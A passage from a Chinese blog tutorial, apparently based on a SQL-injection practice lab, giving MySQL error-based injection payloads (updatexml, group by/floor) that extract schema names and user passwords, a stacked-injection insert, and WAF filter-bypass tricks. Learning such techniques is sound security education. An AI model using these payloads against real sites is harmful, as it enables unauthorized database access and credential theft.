class="keyword">where</span> table_schema</span>=<span class="string">&#x27;security&#x27;</span> <span class="keyword">and</span> table_name =<span class="string">&#x27;users&#x27;</span>),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="meta">#</span></span><br><span class="line">   爆字段名</span><br><span class="line"> </span><br><span class="line"><span class="number">123&#x27;</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> password <span class="title">from</span> (<span class="params"><span class="keyword">select</span> password <span class="keyword">from</span> users <span class="keyword">where</span> username=<span class="string">&#x27;admin1&#x27;</span></span>) b),0x5c),1))#</span></span><br><span class="line"><span class="function">爆密码该格式针对mysql数据库。</span></span><br><span class="line"><span class="function">爆其他表就可以，下面是爆emails表</span></span><br><span class="line"><span class="function">123&#x27; <span class="title">and</span> (<span class="params">updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="keyword">select</span> group_concat(column_name</span>) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema</span>=<span class="string">&#x27;security&#x27;</span> <span class="keyword">and</span> table_name =<span class="string">&#x27;emails&#x27;</span>),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="meta">#</span></span><br><span class="line"> </span><br><span class="line"><span class="number">1&#x27;</span> <span class="keyword">and</span> (updatexml (<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> <span class="title">group_concat</span>(<span class="params">id,email_id</span>) <span class="keyword">from</span> emails),0x5c),1))#   爆字段内容。</span></span><br></pre></td></tr></table></figure>

<h4 id="group-by报错注入"><a href="#group-by报错注入" class="headerlink" title="group by报错注入"></a>group by报错注入</h4><figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">123</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">group</span> <span class="keyword">by</span> concat(database(),<span class="number">0x5c</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))#     爆数据库</span><br><span class="line"><span class="number">123</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">group</span> <span class="keyword">by</span> concat(version(),<span class="number">0x5c</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))#      爆数据库版本</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="number">1</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">where</span> table_schema=database() <span class="built_in">group</span> <span class="keyword">by</span> concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">where</span> table_schema=database() limit <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7e</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))#    通过修改limit后面数字一个一个爆表</span><br><span class="line"><span class="number">1</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">where</span> table_schema=database() <span class="built_in">group</span> <span class="keyword">by</span> concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">where</span> table_schema=database()),<span class="number">0x7e</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))#        爆出所有表</span><br><span class="line"> </span><br><span class="line">  </span><br><span class="line"><span class="number">1</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.columns <span class="built_in">where</span> table_schema=database() <span class="built_in">group</span> <span class="keyword">by</span> concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="built_in">where</span> table_schema=database() <span class="built_in">and</span> table_name=&#x27;users&#x27;),<span class="number">0x7e</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))#    爆出所有字段名</span><br><span class="line"><span class="number">1</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.columns <span class="built_in">group</span> <span class="keyword">by</span> concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(username,password) <span class="keyword">from</span> users),<span class="number">0x7e</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))#    爆出所有字段名</span><br><span class="line"> </span><br><span class="line"><span class="number">1</span>&#x27; <span class="built_in">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span>(<span class="keyword">select</span> <span class="built_in">count</span>(*) <span class="keyword">from</span> information_schema.columns <span class="built_in">where</span> table_schema=database() <span class="built_in">group</span> <span class="keyword">by</span> concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> password <span class="keyword">from</span> users <span class="built_in">where</span> username=&#x27;admin1&#x27;),<span class="number">0x7e</span>,<span class="built_in">floor</span>(<span class="built_in">rand</span>(<span class="number">0</span>)*<span class="number">2</span>)))a)#    爆出该账户的密码。</span><br></pre></td></tr></table></figure>

<h2 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h2><p> &emsp;&emsp;至此大多数的sql注入方法，还有一个堆叠注入，像是这样的用法<code>login_user=1&amp;login_password=1&#39;;insert into users(id,username,password) values (&#39;39&#39;,&#39;less30&#39;,&#39;123456&#39;)--+&amp;mysubmit=Login</code>，这个简单去了解一下即可。下面是一些特殊情况的绕过。</p>
<h3 id="替换绕过"><a href="#替换绕过" class="headerlink" title="替换绕过"></a>替换绕过</h3><p> &emsp;&emsp;很常用的方法，双写穿插。<br> <figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">or</span>     --&gt;</span> oorr</span><br><span class="line"><span class="function"><span class="title">and</span>    --&gt;</span> aandnd</span><br><span class="line"><span class="function"><span class="title">union</span>  --&gt;</span> uunionnion</span><br><span class="line"><span class="function"><span class="title">select</span> --&gt;</span> seselectlect</span><br><span class="line">... ...</span><br></pre></td></tr></table></figure></p>
<h3 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h3><p> &emsp;&emsp;在实战中，这种方法并不常见了<br> <figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">or</span>     --&gt;</span> Or</span><br><span class="line"><span class="function"><span class="title">select</span> --&gt;</span> SEleCt</span><br><span class="line"><span class="function"><span class="title">union</span>  --&gt;</span> UniOn</span><br><span class="line"><span class="function"><span class="title">and</span>    --&gt;</span> aND</span><br></pre></td></tr></table></figure></p>
<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><p> &emsp;&emsp;很常见的一种，也很烦，在每一个空格处替换,报错注入使用空格比较少，也可使用此方法。<br> <figure class="highlight haml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">%<span class="selector-tag">09</span></span> TAB键（水平）</span><br><span class="line"><span class="tag">%<span class="selector-tag">0a</span></span> 换行</span><br><span class="line"><span class="tag">%<span class="selector-tag">0c</span></span> 换页</span><br><span class="line"><span class="tag">%<span class="selector-tag">0d</span></span> return功能</span><br><span class="line"><span class="tag">%<span class="selector-tag">0b</span></span> TAB键（垂直）</span><br><span class="line"><span class="tag">%<span class="selector-tag">20</span></span>,%a0,+ 空格</span><br><span class="line"><span class="comment">/**/ 注释</span></span><br></pre></td></tr></table></figure></p>
<h3 id="逻辑运算符绕过"><a href="#逻辑运算符绕过" class="headerlink" title="逻辑运算符绕过"></a>逻辑运算符绕过</h3><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">and</span> --&gt;</span> &amp;&amp;</span><br><span class="line"><span class="function"><span class="title">or</span>  --&gt;</span> ||</span><br></pre></td></tr></table></figure>

<h3 id="宽字节绕过"><a href="#宽字节绕过" class="headerlink" title="宽字节绕过"></a>宽字节绕过</h3><p> &emsp;&emsp;当斜杠，单引号和双引号过滤或者转义的时候，我们可以采用宽字节绕过。当某字符的大小为一个字节时，称其字符为窄字节当某字符的大小为两个字节时，称其字符为宽字节。所有英文默认占一个字节，汉字占两个字节。也就是全角和半角。</p>
<h3 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h3><p>&emsp;&emsp;很常见的绕过手段了，十六进制编码就行。</p>
<h4 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h4><p>&emsp;&emsp;至此，手动sql注入已经成功出师，关于sql注入，还可以使用sqlmap工具。转至<a href="/2024/8/3/sqlmap/">sqlmap</a>去学习一下吧。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B3%A8%E5%85%A5/" rel="tag"># 注入</a>
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/07/25/BurpSuite/" rel="prev" title="BurpSuite">
                  <i class="fa fa-angle-left"></i> BurpSuite
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/08/03/sqlmap/" rel="next" title="sqlmap">
                  sqlmap <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">muxiahuo</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">51k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">47 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/third-party/pace.js"></script>


  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script async>window.onload=function(){var a=document.createElement('script'),b=document.getElementsByTagName('script')[0];a.type='text/javascript',a.async=!0,a.src='/sw-register.js?v='+Date.now(),b.parentNode.insertBefore(a,b)};</script></body></html>